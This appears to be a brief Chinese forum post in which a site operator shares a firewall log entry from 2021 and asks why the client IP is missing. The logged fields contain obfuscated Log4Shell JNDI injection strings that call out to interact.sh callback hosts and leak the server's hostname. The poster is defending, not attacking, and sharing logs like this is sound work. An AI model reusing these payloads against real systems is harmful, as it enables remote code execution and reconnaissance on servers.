今早看了下日志,发现有一条这样的的记录
- {"client_ip":"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gc.interact.sh}","local_time":"2021-12-14 05:58:45","server_name":"xxx.com","req_url":"/?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7gg.interact.sh/a}","attack_method":"Deny_URL_Args","req_data":"-","rule_tag":"\$\{","user_agent":"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hgzabws7ge.interact.sh}"}
复制代码
居然看不到IP,有带老懂吗  |